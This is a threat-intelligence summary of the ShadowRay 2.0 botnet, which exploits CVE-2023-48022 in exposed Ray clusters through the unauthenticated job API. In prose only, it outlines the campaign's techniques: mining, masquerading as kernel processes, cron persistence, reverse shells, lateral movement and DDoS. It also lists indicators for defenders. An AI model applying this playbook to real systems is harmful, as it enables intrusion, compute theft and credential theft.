ShadowRay

ShadowRay 2.0 is a malware campaign and self-propagating cryptomining botnet targeting internet-exposed Ray clusters. It exploits CVE-2023-48022, a critical missing-authentication/remote code execution issue in the Ray framework, by abusing exposed Ray dashboards and the unauthenticated Job Submission API (/api/jobs/) to execute reconnaissance commands and multi-stage Bash and Python payloads. Oligo Security reported the activity as an evolution of earlier ShadowRay exploitation observed between September 2023 and March 2024, with the newer campaign active since at least September 2024.

The malware is designed to hijack AI compute infrastructure, especially clusters with NVIDIA GPUs, and uses Ray orchestration features to spread across all nodes in a cluster and to other exposed Ray environments, effectively behaving like a worm. Payload delivery infrastructure was observed on GitLab and later GitHub after takedowns. Reported operator naming includes IronErn440. Oligo assessed the payloads were likely generated with assistance from large language models based on code structure, comments, and error-handling patterns.

Observed capabilities include deployment of XMRig for Monero mining, CPU throttling to about 60% to reduce detection, process masquerading as legitimate Linux kernel worker services or names such as "dns-filter," termination of competing miners, blocking of rival mining pools via /etc/hosts and iptables, persistence via cron jobs running every 15 minutes and, in some reporting, systemd modifications, and establishment of Python reverse shells for remote control. The malware also uses Ray scheduling/orchestration features, including lateral movement to non-internet-facing nodes. Region-specific behavior was observed for victims in China.

Beyond cryptomining, compromised Ray clusters were reported as being used for DDoS activity via Sockstress, a TCP state exhaustion tool, and for access to sensitive assets present on clusters, including source code, AI models and datasets, cloud credentials, database credentials, and retained production data. The campaign has been described as global in scope, with reporting citing more than 230,000 publicly accessible Ray servers and attacks against over 200,000 exposed Ray servers worldwide.

High-confidence indicators and artifacts mentioned in reporting include exploitation of CVE-2023-48022; abuse of the Ray Dashboard port 8265 and /api/jobs/ endpoint; use of XMRig and Sockstress; cron-based reinfection/update checks every 15 minutes; reverse shells; and attacker-controlled GitLab/GitHub infrastructure including repository account names such as "ironern440-group" and "thisisforwork440-ops."